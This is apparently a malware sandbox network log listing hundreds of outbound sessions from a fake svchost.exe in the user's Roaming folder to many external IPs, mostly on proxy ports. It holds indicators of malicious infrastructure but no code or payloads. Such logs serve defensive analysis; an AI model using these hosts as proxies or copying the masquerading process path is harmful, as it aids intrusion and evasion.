Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4229	192.168.2.5	63160	104.16.108.234	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4230	192.168.2.5	63062	47.243.205.1	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4231	192.168.2.5	63265	43.157.51.43	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4232	192.168.2.5	63267	43.157.51.43	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4233	192.168.2.5	62974	8.222.152.158	55555	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4234	192.168.2.5	62291	103.97.179.115	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4235	192.168.2.5	63269	43.157.51.43	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4236	192.168.2.5	63214	185.238.228.202	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4237	192.168.2.5	63206	104.17.171.79	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4238	192.168.2.5	63112	147.75.34.85	10007	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4239	192.168.2.5	62566	181.212.136.34	48993	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4240	192.168.2.5	63145	62.3.6.76	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4241	192.168.2.5	63107	128.199.202.122	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4242	192.168.2.5	63111	43.131.242.162	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4243	192.168.2.5	63236	172.67.182.22	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4244	192.168.2.5	63136	51.75.126.150	34144	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4245	192.168.2.5	63137	16.163.88.228	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4246	192.168.2.5	63121	103.213.97.74	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4247	192.168.2.5	63212	107.180.88.41	58037	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4248	192.168.2.5	63139	91.189.177.189	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4249	192.168.2.5	63156	88.99.138.21	6969	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4250	192.168.2.5	62578	72.195.34.41	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4251	192.168.2.5	63147	148.72.209.174	4734	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4252	192.168.2.5	63164	150.109.243.156	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4253	192.168.2.5	63226	162.223.116.75	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4254	192.168.2.5	63235	13.59.156.167	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4255	192.168.2.5	63104	185.118.153.110	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4256	192.168.2.5	63259	104.16.105.198	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4257	192.168.2.5	63181	45.81.232.17	48085	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4258	192.168.2.5	63197	160.16.90.35	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4259	192.168.2.5	63281	43.157.51.43	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4260	192.168.2.5	63218	147.75.92.251	9401	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4261	192.168.2.5	62772	185.189.199.75	23500	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4262	192.168.2.5	63183	178.54.21.203	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4263	192.168.2.5	63220	211.222.252.187	8197	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4264	192.168.2.5	63209	146.59.147.11	62801	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4265	192.168.2.5	63191	114.132.202.78	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4266	192.168.2.5	63175	49.228.131.169	5000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4267	192.168.2.5	63247	43.163.192.3	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4268	192.168.2.5	63257	184.170.249.65	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4269	192.168.2.5	63253	177.234.244.174	32213	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4270	192.168.2.5	63213	185.219.133.106	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4271	192.168.2.5	63250	51.20.50.149	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4272	192.168.2.5	62825	52.151.210.204	9000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4273	192.168.2.5	63252	111.90.150.109	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4274	192.168.2.5	63261	173.249.29.243	9123	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4275	192.168.2.5	63217	60.12.168.114	9002	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4276	192.168.2.5	63244	89.218.8.152	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4277	192.168.2.5	63254	103.83.232.122	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4278	192.168.2.5	62789	31.200.242.201	15755	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4279	192.168.2.5	63285	203.32.120.202	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4280	192.168.2.5	62787	193.239.56.84	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4281	192.168.2.5	63300	104.16.105.146	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4282	192.168.2.5	63315	188.114.99.37	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4283	192.168.2.5	62864	23.225.72.125	3503	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4284	192.168.2.5	62820	138.36.199.14	4153	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4285	192.168.2.5	62842	194.182.187.78	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4286	192.168.2.5	63330	104.25.135.170	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4287	192.168.2.5	63278	185.81.153.162	3389	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4288	192.168.2.5	63273	113.208.119.142	9002	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4289	192.168.2.5	63309	51.158.98.197	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4290	192.168.2.5	63299	187.122.105.181	4153	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4291	192.168.2.5	63361	104.21.124.121	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4292	192.168.2.5	63346	209.97.150.167	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4293	192.168.2.5	63317	190.103.177.131	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4294	192.168.2.5	63307	49.4.48.128	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4295	192.168.2.5	63323	94.45.74.60	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4296	192.168.2.5	63294	65.1.244.232	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4297	192.168.2.5	63383	104.27.15.161	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4298	192.168.2.5	63325	185.49.30.5	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4299	192.168.2.5	63324	62.33.207.202	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4300	192.168.2.5	63321	122.114.232.137	808	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4301	192.168.2.5	63384	184.170.249.65	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4302	192.168.2.5	63152	198.8.84.3	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4303	192.168.2.5	63389	52.151.210.204	9000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4304	192.168.2.5	63347	103.190.54.141	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4305	192.168.2.5	63362	45.117.179.179	35942	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4306	192.168.2.5	63371	39.108.227.108	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4307	192.168.2.5	63388	43.163.192.3	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4308	192.168.2.5	61530	187.216.144.170	5678	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4309	192.168.2.5	63386	150.109.243.156	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4310	192.168.2.5	63387	211.222.252.187	8197	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4311	192.168.2.5	62957	212.110.188.213	34411	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4312	192.168.2.5	62989	187.95.82.175	3629	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4313	192.168.2.5	63404	20.210.113.32	8123	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4314	192.168.2.5	63020	103.76.180.108	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4315	192.168.2.5	63044	51.15.254.129	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4316	192.168.2.5	63045	194.145.209.187	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4317	192.168.2.5	63089	159.223.71.71	59098	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4318	192.168.2.5	63413	89.218.8.152	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4319	192.168.2.5	61756	142.4.7.20	39782	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4320	192.168.2.5	62759	107.181.168.145	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4321	192.168.2.5	63427	20.206.106.192	8123	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4322	192.168.2.5	63473	104.19.233.117	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4323	192.168.2.5	63454	184.170.249.65	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4324	192.168.2.5	63432	185.81.153.162	3389	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4325	192.168.2.5	63201	167.179.45.56	4153	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4326	192.168.2.5	63134	54.36.122.16	17188	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4327	192.168.2.5	63151	213.136.78.200	40927	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4328	192.168.2.5	63242	162.144.36.208	38242	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4329	192.168.2.5	63417	124.163.236.54	7302	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4330	192.168.2.5	63177	189.240.60.164	9090	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4331	192.168.2.5	61719	168.138.231.177	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4332	192.168.2.5	61762	179.43.10.0	8085	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4333	192.168.2.5	62987	72.210.252.137	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4334	192.168.2.5	63439	116.199.168.1	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4335	192.168.2.5	62991	117.160.250.163	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4336	192.168.2.5	63479	213.202.230.241	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4337	192.168.2.5	63467	138.36.150.15	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4338	192.168.2.5	63486	136.243.82.121	1082	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4339	192.168.2.5	63483	185.49.30.5	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4340	192.168.2.5	63492	107.181.148.227	6087	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4341	192.168.2.5	63490	118.218.126.54	9400	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4342	192.168.2.5	63484	128.199.221.91	17532	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4343	192.168.2.5	63471	139.59.1.14	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4344	192.168.2.5	63507	45.43.81.164	5811	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4345	192.168.2.5	63502	211.222.252.187	8197	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4346	192.168.2.5	63530	172.67.209.12	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4347	192.168.2.5	63489	103.83.232.122	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4348	192.168.2.5	63511	203.74.125.18	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4349	192.168.2.5	63510	150.109.243.156	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4350	192.168.2.5	63246	115.127.2.230	5678	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4351	192.168.2.5	63518	203.218.172.225	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4352	192.168.2.5	63515	82.157.194.44	7890	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4353	192.168.2.5	63528	177.234.244.174	32213	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4354	192.168.2.5	63565	104.19.120.84	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4355	192.168.2.5	63525	8.217.143.187	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4356	192.168.2.5	61912	128.199.221.91	7176	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4357	192.168.2.5	63582	172.67.182.77	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4358	192.168.2.5	63280	82.113.157.122	31280	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4359	192.168.2.5	63535	156.67.217.159	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4360	192.168.2.5	63524	103.190.54.141	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4361	192.168.2.5	62637	162.214.102.195	60891	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4362	192.168.2.5	63604	104.25.194.175	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4363	192.168.2.5	63458	117.160.250.163	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4364	192.168.2.5	63554	51.15.210.79	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4365	192.168.2.5	63287	93.90.212.2	4153	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4366	192.168.2.5	63577	51.210.223.9	3000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4367	192.168.2.5	63592	184.170.249.65	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4368	192.168.2.5	62039	12.186.205.121	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4369	192.168.2.5	61980	198.12.255.193	28763	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
